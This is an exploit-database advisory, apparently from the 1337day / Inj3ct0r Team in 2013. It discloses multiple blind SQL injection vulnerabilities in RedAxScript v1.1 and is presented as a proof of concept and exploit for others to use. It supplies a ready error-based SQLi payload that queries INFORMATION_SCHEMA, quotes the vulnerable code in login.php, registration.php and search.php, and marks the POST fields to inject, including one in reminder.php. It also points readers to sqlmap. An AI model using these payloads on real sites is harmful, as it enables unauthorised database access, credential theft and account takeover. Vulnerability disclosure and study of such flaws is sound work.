1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 ######################################### 1 0 I'm KedAns-Dz member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 [>] Title : RedAxScript v1.1 <= Multiple Blind SQL Injection Vulnerabilities [>] Author : KedAns-Dz [+] E-mail : ked-h (@hotmail.com / @1337day.com) [+] FaCeb0ok : fb.me/Inj3ct0rK3d [+] TwiTter : @kedans [#] Platform : PHP / WebApp [+] Cat/Tag : Multiple , SQL Injection , Blind SQLi [<] <3 <3 Greetings t0 Palestine <3 <3 - Blind SQL Injection ( 'POST' Query and 'GET' the full 'Information_Schema' ): AND (SELECT 8041 FROM(SELECT COUNT(*),CONCAT(0x3a6f79753a,(SELECT (CASE WHEN (8041=8041) THEN 1 ELSE 0 END)),0x3a70687a3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) - POST Inject via HTTP headers attack's or HTTP debugger, HackBar / or use any toolkit like sqlmap, sql-ninja etc.. #### P.O.C [1] => in (login.php) | lines: ( 69 , 73.. 74) ## **** $post_user = clean ($_POST['user'], 0); $users_query = 'SELECT id, name, user, email, password, language, status, groups FROM ' . PREFIX . 'users WHERE user = \'' . $post_user . '\''; mysql_query $users_result = mysql_query($users_query); **** [+] POST Data on > : user=[ SQL Injection Here ] ############################################################ #### P.O.C [2] => in (registration.php) | lines: ( 59.. 62 , 142..156) **** $r['email'] = clean ($_POST['email'], 3); $r['user'] = clean ($_POST['user'], 0); $r['name'] = clean ($_POST['name'], 0); **** mysql_query mysql_query($query); $query = 'INSERT INTO ' . PREFIX . 'users (' . $key_string . ') VALUES (' . $value_string . ')'; $key_string .= ', '; // if($last != $key), $key_string .= $key; foreach($r as $key=>$value) $value_string .= '\'' . $value . '\''; **** [+] go to registration and POST Data on > : ( email, user, name ) => email=-[ SQL Injection Here ]--&user=-[ SQL Injection Here ]--&name=-[ SQL Injection Here ]-- ############################################################ #### P.O.C [3] => in (search.php) | lines: ( 47, 61, 70.. 82) ## **** $search_terms = clean ($_POST['search_terms'], 1); **** $query .= ')'; // if($search), $query .= ' || '; // if($search), if($last != $key), $query = 'SELECT id, title, alias, description, date, category, access FROM '... foreach($search as $key=>$value) // if($search), $search = array_filter(explode(' ', $search_terms)); **** mysql_query $result = mysql_query($query); $query .= ' ORDER BY date DESC LIMIT 50'; **** [+] in Search area : POST Data on ( search_terms ) search_terms=[ SQL Injection Here ] #### && Other Bug/Vulnerability in (reminder.php) when u do remind passwd :p lines : ( 57 , & 80.. 85 ) [+] POST Data on > : ( email=[ SQLi ] ) ## note : you can see befor any $_POST there is a function ' clean ' ( included clean.php ) but blind sqli attacks still workin' ,the clean func replace u'r input to alpha-num output just it #### #<! THE END ^_* ! , Good Luck all <3 | 1337-DAY Aint DIE ^_^ !> #<+ Proof Of Concept & Exploit Hunted by : Khaled [KedAns-Dz] +> #<+ Copyright &#169; 2013 Inj3ct0r Team | 1337day Exploit Database +> # ** Greetings : < Dz Offenders Cr3w [&] Algerian Cyber Army > * # ** ! Hassi Messaoud <3 1850 Hood <3 , Dedicate fr0m Algeria ** #--------------------------------------------------------------- # Greetings to my Homies : Indoushka , Caddy-Dz , Kalashinkov3 , # Chevr0sky , Mennouchi.Islem , KinG Of PiraTeS , TrOoN , T0xic, # & Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz , Barbaros-DZ , & # & r0073r , KeyStr0ke , JF , Sid3^effectS , r4dc0re , CrosS , & # & KnocKout , Angel Injection , The Black Divels , kaMtiEz , & # & Evil-Dz , Elite_Trojan , MalikPc , Marvel-Dz , Shinobi-Dz, & # =( packetstormsecurity.org * metasploit.com * OWASP & OSVDB )= ####